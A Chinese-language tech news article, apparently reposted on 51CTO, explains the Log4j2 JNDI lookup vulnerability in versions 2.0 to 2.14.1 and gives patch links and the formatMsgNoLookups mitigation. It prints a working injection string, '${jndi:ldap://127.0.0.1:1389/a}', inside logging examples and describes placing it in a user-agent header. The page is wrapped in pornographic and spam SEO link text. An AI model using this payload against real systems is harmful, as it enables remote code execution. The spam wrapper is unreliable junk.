成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

瞎記日志也有錯!Log4j2史詩級漏洞,影響面極大,味道不好聞!

安全 漏洞
Log4j今日被曝嚴重漏洞,作為Java界日志工具的杠把子,Log4j和Logback幾乎統一了江湖,影響面不可謂不大。

[[439857]]

Log4j今日被曝嚴重漏洞,作為Java界日志工具的杠把子,Log4j和Logback幾乎統一了江湖,影響面不可謂不大。比如,Apache Struts2、Apache Solr、Apache Druid、Apache Flink、Minecraft 、iCloud整個生態都受到影響。

被影響的版本包括從2.0到2.14.1,跨度比較大。

  1. 2.0 <= Apache log4j <= 2.14.1 

趕緊瞧一下自己有沒有中招。

通過Debug log4j的代碼,最終定位到發生問題的代碼。可以看到,一個日志組件,實現的功能遠遠比我們平常使用的要多。

如果用戶打印了下面的日志。

  1. logger.error("${jndi:ldap://127.0.0.1:1389/a}"); 

那么將會觸發JndiLookup.java中的方法,主動發起連接。通過精心構造的Playload,即可允許攻擊者執行任何代碼。

這是非常危險的。經測試,即使使用占位符的方式而不是拼接字符串的方式,也不能避免這個問題。比如,如果用戶在登錄頁面輸入了${jndi:ldap://127.0.0.1:1389/a},沒有做過濾,又在后端打印了username變量的時候,就會觸發這個漏洞。

  1. public static void main(String[] args) { 
  2.      String username = "${jndi:ldap://127.0.0.1:1389/a}"
  3.      logger.error("用戶名:{}", username); 

它的影響存在于方方面面,只要你打印了某些東西,這些東西又能被構造的話,就會發生問題。比如你從http頭里面打印了useragent,那么我們就可以把playload塞進去。

  1. string userAgent = he.getRequestHeader("user-agent"); 
  2.      
  3. log.info("Request User Agent:" + userAgent); 
  4.  
  5. String response = "<h1>Hello There, " + userAgent + "!</h1>"

所以,把它稱作史詩級的漏洞,不足為過。

log4j-2.15.0-rc1發布了緊急補丁。

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1

但不久又被發現依然存在新的問題。所以目前最好的方式是升級到rc2版本。

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

可惜的是,現在我們并沒有在maven的中央倉庫發現這個版本。你需要自行修復。

你可以到apache的倉庫中找找。

https://repository.apache.org/content/groups/snapshots/org/apache/logging/log4j/log4j-core/

鑒于更新jar包復雜的原因,建議直接在JVM啟動參數里進行規避。不知道怎么改的直接看圖。

  1. -Dlog4j2.formatMsgNoLookups=true 

漏洞影響重大,你的公司或許已經緊鑼密鼓的開始的打補丁。

祝你好運!

 

作者簡介:小姐姐味道 (xjjdog),一個不允許程序員走彎路的公眾號。聚焦基礎架構和Linux。十年架構,日百億流量,與你探討高并發世界,給你不一樣的味道。

 

責任編輯:武曉燕 來源: 小姐姐味道
相關推薦

2021-12-19 07:28:06

Log4j2漏洞AMD

2021-12-30 08:55:41

Log4j2FastJson漏洞

2022-01-27 09:16:08

CPU內存.NET

2021-12-16 10:43:04

黑客網絡攻擊漏洞

2022-05-30 14:04:23

Log4j遠程代碼漏洞

2021-12-11 13:29:36

SpringBoot 官方

2022-02-13 23:51:44

DeepfenceLog4j2漏洞

2025-05-09 09:18:33

2021-12-11 13:22:10

漏洞公司Log4j

2022-01-10 11:16:40

漏洞 Log4j2Jndi

2021-12-13 07:28:34

Java漏洞復現

2021-04-02 07:58:36

LogbackLog4j2日志

2021-12-20 09:32:55

Log4j2漏洞攻擊

2021-12-14 06:59:39

Apache Log4j2 漏洞

2021-12-29 06:54:23

Log4j2 漏洞績效

2021-12-13 06:56:46

漏洞Log4j對象

2021-12-23 11:03:25

Log4j 漏洞漏洞

2021-12-13 01:49:34

漏洞Log4j代碼

2022-01-11 09:56:15

Log4j2漏洞FTC

2024-01-03 07:19:19

LogbackLog4j2Java
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 欧美一级淫片007 | 日韩在线播放第一页 | 精品亚洲一区二区 | 亚洲精品1区 | 91视频在线 | 在线成人 | 免费h在线| 亚洲精品在线91 | 日韩一二三区视频 | av免费网站在线观看 | 国产精品久久久久久久7电影 | 中文字幕一区二区三区日韩精品 | 久久伦理电影 | 一级片在线观看 | 国产福利在线 | 国产精品久久9 | 久久亚洲欧美日韩精品专区 | 国产欧美在线 | 日本久久久久久 | 综合五月婷 | 成人乱人乱一区二区三区软件 | 免费一级欧美在线观看视频 | 欧美精品啪啪 | 性做久久久久久免费观看欧美 | 97国产一区二区 | 中文字幕欧美一区二区 | 国产美女久久久 | 国产精品视频一区二区三区 | 美女黄18岁以下禁止观看 | 韩国电影久久 | 成人妇女免费播放久久久 | 一级a毛片 | 亚洲一区久久 | 夜夜骑天天干 | 日韩精品一区二区三区中文在线 | 国产精品a免费一区久久电影 | 国产日韩久久 | 日韩成人精品在线 | 久久久久国产 | 欧美一区二区激情三区 | 91久久网站 |